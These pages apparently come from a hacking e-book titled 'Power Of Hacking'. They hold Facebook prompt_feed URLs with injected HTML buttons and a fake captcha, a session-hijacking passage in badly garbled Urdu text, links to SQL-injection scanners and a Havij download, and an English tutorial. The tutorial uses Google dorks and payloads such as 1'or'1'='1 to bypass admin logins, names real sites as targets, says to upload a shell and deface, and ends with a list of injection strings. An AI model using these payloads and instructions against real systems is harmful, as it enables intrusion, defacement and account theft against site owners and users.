Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree ک وڈ: Capcha http://www.facebook.com/connect/prompt_feed.php?&attachment={%27href%27:%27http:// t.co/q3EzkPR%27,%27name%27:%27%20%3Ccenter%3E%3Cbutton+type%3D%22button% 22%3EMengamankan%20Facebook%20Terbaru%3C/button%3E%3C/center%3E%3Cfb:captc ha%20showalways=%22true%22%20/%3E%3Cinput%20type=%22submit%22%20/%3E%3 C/form%3E%3Cbutton+type%3D%22button%22%3Ekirim%20%3C/button%3E%27} TEXT AREA : http://m.facebook.com/cyber4rt/posts/248470535173103 Code: http://www.facebook.com/connect/prompt_feed.php?&api_key=209403259107231&attachme nt={%27name%27:%27%20%3Ccenter%3E%3Cfb:editortext%20label=%22Powered%20By%22%20name=%22title%22%20value=%22%20http://bl og.cyber4rt.com%22/%3E%3C/br%3E%3Ccenter%3E%3C/center%3E%3Cfb:editortextarea%20label=%22Komentar%20Anda%22%20name=%22comment%22%20value=%22 %20JEMPOL%22/%3E%3Cfb:editorbuttonset%3E%3Ccenter%3E%3Cbutton+type%3D%22button%22%3EKomentari%3C/butto n%3E%3C/center%3E%27} LIVE STREAM : http://m.facebook.com/cyber4rt/posts/161116127297514 Code: http://www.facebook.com/connect/prompt_feed.php?display=touch&api_key=209403259107 231&link=http://t.co/q3EzkPR&attachment={%27description%27%3A%27%3Cfb:livestream%20event_app_id=%22266225821384%22%20width=%22400%22%20height=%2250 0%22%20xid=%22%22%20via_url=%22http://t.co/q3EzkPR%22%20always_post_to_friends =%22false%22%3E%3C/fb:live-stream%3E+%27} Hack Tutrial:-
ہ ے؟ ک یب ض ی شي ہ ے؟ ک یب ض ی شي ہ ے؟ ک یب اغوا ک ے اج الش ہ ے رہ ب ک ر چوری ض ی شي ف عبل هوجودٍ اغوا ک ے اج الش. عول ک ے ت صذی ق ه ق صذ ث ٌ یبدی ک ب اغوا ک ے اج الش ہ ے ل ئے ک ے ک رً ے حب صل ر ضبئ ی هجبز غ یر ک و ضبئ ٹ وی ت ی ب ک و پ یوٹ ر اور پ بش ث بئ ی ک و. ٍال فبظ ضبد ه یں، گ ے ک ری ں اى ال گ پ ر طور ک الئ ٌٹ دو ضرے ک چھ ہ وئ ے ک رت ے ا ض ت عوبل ض ی شي اى ہ ی کروں.
ای ک دره یبى ک ے ه ش ی ٌوں دو ہ ی کر ای کTCP ہ ے اغوا ک ے اج الش ضی ٹ ی جت ہ ے ل ی تب زی بدٍ ض ی شي. ضت ای ک صرف ت صذی ق زی بد ٍ ضےTCP ضے ث عذ ک ے ہ ے ہ وت ی وق ت اش پ ر آغبز ک ے ض ی شي، ای ک ہ ی کر اش ہ ے دی تب اجبزت ک ی ک رً ے حب صل ر ضبئ ی ت ک ه ش یي طری قوں ک ے اغوا ک ے اج الش هخ ت لف: ہ ے جبت ب ک یب حب صل ضے طری قوں ری ل چوری ک ے ض ی شي
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 298
®Power Of Hacking Facebook:https://www.facebook.com/HAckingRouterwifiFree :ت ع یي ض ی شي 1. ه ثبل .ہ ے ک رت ب ت ع یي ک ب ض ی شي ش ٌبخت ک ب صبرف ک ب ک رً ے ش کبر جبت ب جبً ب ہ ی کر ،ه یں طری قے اش جبً ب ضے ً بم ضبت ھ ک ے ل ٌک ای ک ک ہ ہ ے ه ش تول پ ر ض ی شي ش ٌبخت هخ صوص ک طی ہ ی کر ،پ ر طور ک ے ا ض ت عوبل ک ب ض ی شي ک ہ ہ ی کر ،ت و ک ی پ یروی ک ی ل ٌک اش ک و ه ق تول .گ ے ث ھ یج یں ه یل ای ک و ش کبر .ہ یں ض ک تے ک ر حب صل ر ضبئ ی ت ک اى اور ہ یں ک رت ے
):ض ٌ ف ٌگ ض ی شي( SideJackingض ی شي 2. ک و اش .ض ٌ ف ٌگ اور ک رً ے چوری ک وک ی ض ی شي پ ی کٹ ک ے ا ض ت عوبل آور حو لہ ،ه یں طری قے اش ث بر ای ک ل ی کي ).ک رت ب خ ف یہ ض ی شي( ا ض ت عوبل SSLضبئ ٹص وی ت ک چھ ،ل ئے ک ے ک رً ے ک ے روک ٌے پ ڑھ ٹ ری فک ک ے ورک ً یٹ اش .ک رت ے ً ہ یں ا ض ت عوبل ک ب ک بری خ ف یہ ل ئے ک ے آرام ک ے ضبئ ٹ ت وث یق ک یب پ یش پ ر ص فحبت وی ت ی ب ضرور دی کھے ضے طرف ک ی ک الئ ٌٹ ک و آوروں حو لہ ک ہ ہ یں ض ک تے .ہ ے دی تب اجبزت ک ی ک رً ے ت قط یع ڈی ٹب ت وبم ک ہ ہ ے جبت ب .ہ یں دوچبر ضے خطرے ک ے ق طن اش ک ے اغوا ک ے اج الش ک ی Hotspotsاهبئ جھوت ):وغ یر ٍ ،ٹ روجي ،ک وڈز ا ض کرپ ٹ جبوا ه ضر (XSS،حو لوں ضبئ ڈ ک الئ ٌٹ 3. ک ر چوری ض ی شي طرف ک ی چ الً ے ک و ک وڈ ک ے ض کرپ ٹ جبوا ه ضر ه یں ض ط ٹن ک الئ ٌٹ ہ ی کر اى اور ک رً ے حو لہ پ ر ضبئ ٹص وی ت ک چھ ہ وئ ے ک رت ے ا ض ت عوبل XSSہ ی کروں پ ر طور عبم .ہ یں ض ک تے .ک ری ں داخل ک وڈ ض کرپ ٹ جبوا ه ضر اپ ٌے ک ے ہ ے جبت ب ک یب ث ھرو ضہ پ ر ضبئ ٹ وی ت اش ،گ ے ک ری ں دورٍ ک ب ضبئ ٹ وی ت ً ے اً ہوں ه یں ً قطہ ک الئ ٌٹ .گ ی جبئ ے دی دے پ ھبً طی ک و ض کرپ ٹ جبوا ه ضر ہ یں ،ک رت ے هالحظہ ل ٌک ک ب ه ق تول .ک ے دی کھ ٌے ک و .گ ب ک رے چوری ڈی ٹب خ ف یہ دی گر اور ک وک یس ض ی شي اش :ر ضبئ ی ط ج عی 4. عبم .ہ ے آ ضبى ی ہ ،ل ئے ک ے ک رً ے چوری ک و ض ی شي ک ے اش ت و ہ ے رک ھ تب ر ضبئ ی ط ج عی ہ ی کر )ه یل جی ،ث ک ف یص( ضبئ ٹص وی ت ک چھ ،ه یں ک ی فے پ ج لک .گ ب ہ و واق ع ه یں ک ی فے عواهی اش پ ر طور .ہ یں ض ک تے ک ر چوری ک وک یس ض ی شي ہ ی کر ای ک آئ ے ث عذ ک ے ش کبر .اى ال گ ک ے ا ض ت عوبل پ ر :اغوا ک ے اج الش ہ وئ ے ک رت ے ا ض ت عوبل ک ب اهذادی ہ هوزی الFiresheep- ا ض ت عوبل ک ب . Firesheepہ ے اهذادی ہ هوزی ال ه شہور ک ہ ہ ے دی ب ث ٌب آ ضبى ث ہت اغوا ک ے اج الش Firesheep ک ب . Firesheepہ یں ض ک تے ک ر چوری ض ی شي ک ی صبرف یي ف بئ ی وائ ی عواهی ک و آپ ،ہ وئ ے ک رت ے ت ک اک بؤً ٹ ش کبر ک ب ضبئ ٹص وی ت دی گر ک چھ اور ٹ وی ٹر ،ث ک ف یص ک و آپ ،ہ وئ ے ک رت ے ا ض ت عوبل ک رت ے ا ض ت عوبل FireSheepطرح ک ص :پ ڑھ یں هسی ذ ه یں ث برے . Firesheepہ یں ض ک تے ک ر حب صل ر ضبئ ی ک ے ک رً ے ہ یک اک بؤً ٹ ث ک ف یص ہ وئ ے Hack Tutrial:-
ف ہر ضت ک ی ضبئ ٹص وی ت ض ک ی ٌر اً ج ک شي http://www.be007.gigfa.com/scanner/scanner.php http://www.sunmagazin.com/tools/hack/SQLI-Scan http://scanner.drie88.tk
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 299
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan http://wolfscps.com/gscanner.php Hack Tutrial:-
HAVIJ ALL
http://www.4shared.com/zip/_j3ImNBPce/havij_all.html Hack Tutrial:-
HACK WEBSITE'S ADMIN PANEL USING BASIC SQL INJECTION
You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection). I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.
Dorks: inurl:adminlogin.aspx inurl:admin/index.php inurl:administrator.php inurl:administrator.asp inurl:login.asp inurl:login.aspx inurl:login.php inurl:admin/index.php Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 300
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree inurl:adminlogin.aspx
# Try to make your own dorks also to get more success rate.
Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as: User: 1'or'1'='1 Password: 1'or'1'='1
Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website.
Some websites which I got: http://gimtech.in/Webadmin/AdminLogin.aspx http://welkinindiagroup.com/admin/adminlogin.aspx http://nobinsolutions.com/Adminlogin.aspx
Other InjecTion Queries: ‘ or 1=1 – 1'or’1'=’1 admin’– ” or 0=0 – or 0=0 – ‘ or 0=0 # ” or 0=0 # or 0=0 # ‘ or ‘x’='x ” or “x”=”x Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 301
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree ‘) or (‘x’='x ‘ or 1=1– ” or 1=1– or 1=1– ‘ or a=a– ” or “a”=”a ‘) or (‘a’='a “) or (“a”=”a hi” or “a”=”a hi” or 1=1 – hi’ or 1=1 – hi’ or ‘a’='a hi’) or (‘a’='a hi”) or (“a”=”)
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 302